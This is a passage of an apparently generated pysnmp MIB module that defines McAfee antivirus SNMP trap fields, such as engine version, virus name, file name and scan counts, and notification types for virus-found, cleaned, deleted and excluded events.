mcafee = MibIdentifier((1, 3, 6, 1, 4, 1, 3401, 12))
mcafeeTVDTrap = MibIdentifier((1, 3, 6, 1, 4, 1, 3401, 12, 0))
mcafeeStandardTrapField = MibIdentifier((1, 3, 6, 1, 4, 1, 3401, 12, 1))
# Read-only scalar trap fields under .12.1.*; each is registered with
# either 'mandatory' or 'optional' status when MIB texts are loaded.
mcafee_TRAPID = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_TRAPID.setStatus('mandatory')
mcafee_ENGINEVERSION = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_ENGINEVERSION.setStatus('mandatory')
mcafee_DATVERSION = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 3), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_DATVERSION.setStatus('mandatory')
mcafee_ENGINESTATUS = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_ENGINESTATUS.setStatus('mandatory')
mcafee_VIRUSNAME = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 5), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_VIRUSNAME.setStatus('mandatory')
mcafee_VIRUSTYPE = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 6), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_VIRUSTYPE.setStatus('mandatory')
mcafee_FILENAME = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 7), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_FILENAME.setStatus('mandatory')
mcafee_USERNAME = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 8), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_USERNAME.setStatus('mandatory')
mcafee_OS = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 9), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_OS.setStatus('mandatory')
mcafee_PROCESSORSERIAL = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 10), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_PROCESSORSERIAL.setStatus('mandatory')
mcafee_TASKNAME = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 11), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_TASKNAME.setStatus('mandatory')
# Scan statistics (note: sub-ids 12-14 are unused in the source MIB).
mcafee_NUMVIRS = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 15), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_NUMVIRS.setStatus('mandatory')
mcafee_NUMCLEANED = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 16), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_NUMCLEANED.setStatus('mandatory')
mcafee_NUMDELETED = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 17), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_NUMDELETED.setStatus('mandatory')
mcafee_NUMQUARANTINED = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 18), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_NUMQUARANTINED.setStatus('mandatory')
mcafee_SCANRETURNCODE = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 19), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_SCANRETURNCODE.setStatus('mandatory')
# Mail / groupware related fields (all optional except the mail addresses).
mcafee_MAILFROMNAME = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 30), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_MAILFROMNAME.setStatus('mandatory')
mcafee_MAILTONAME = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 31), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_MAILTONAME.setStatus('mandatory')
mcafee_MAILCCNAME = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 32), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_MAILCCNAME.setStatus('mandatory')
mcafee_MAILSUBJECTLINE = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 33), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_MAILSUBJECTLINE.setStatus('optional')
mcafee_MAILIDENTIFIERINFO = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 34), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_MAILIDENTIFIERINFO.setStatus('optional')
mcafee_NOTEID = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 35), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_NOTEID.setStatus('optional')
mcafee_NOTESSERVERNAME = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 36), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_NOTESSERVERNAME.setStatus('optional')
mcafee_NOTESDBNAME = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 37), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_NOTESDBNAME.setStatus('optional')
mcafee_DOMAIN = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 38), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_DOMAIN.setStatus('optional')
mcafee_OBRULE = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 39), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_OBRULE.setStatus('optional')
mcafee_LANGUAGECODE = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 40), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_LANGUAGECODE.setStatus('optional')
# Client / event / timing context fields.
mcafee_CLIENTCOMPUTER = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 41), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_CLIENTCOMPUTER.setStatus('optional')
mcafee_TSCLIENTID = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 42), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_TSCLIENTID.setStatus('optional')
mcafee_ACCESSPROCESSNAME = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 43), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_ACCESSPROCESSNAME.setStatus('optional')
mcafee_EVENTNAME = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 44), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_EVENTNAME.setStatus('optional')
mcafee_GMTTIME = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 45), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_GMTTIME.setStatus('optional')
mcafee_TIME = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 46), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_TIME.setStatus('optional')
mcafee_SOURCEIP = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 47), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_SOURCEIP.setStatus('optional')
mcafee_TARGETIP = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 48), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_TARGETIP.setStatus('optional')
# Trap (NotificationType) definitions under mcafeeTVDTrap (.12.0); each one
# binds the full set of NAI-MIB and TVD-MIB payload objects defined above.
# Trap ids: 9999 = test trap, 1024 = virus found, 1025 = file cleaned,
# 1026 = file clean error.
mcafee_EVENT_TEST_TRAP = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,9999)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_VIRFOUND = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1024)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_FILECLEANED = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1025)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_FILECLEANERROR = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1026)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_FILEDELETED = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1027)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_FILEDELETEERROR = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1028)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_FILEEXCLUDING = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1029)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_EXCLUDEERR = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1030)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_INFECTION_ACESSDENIED = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1031)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
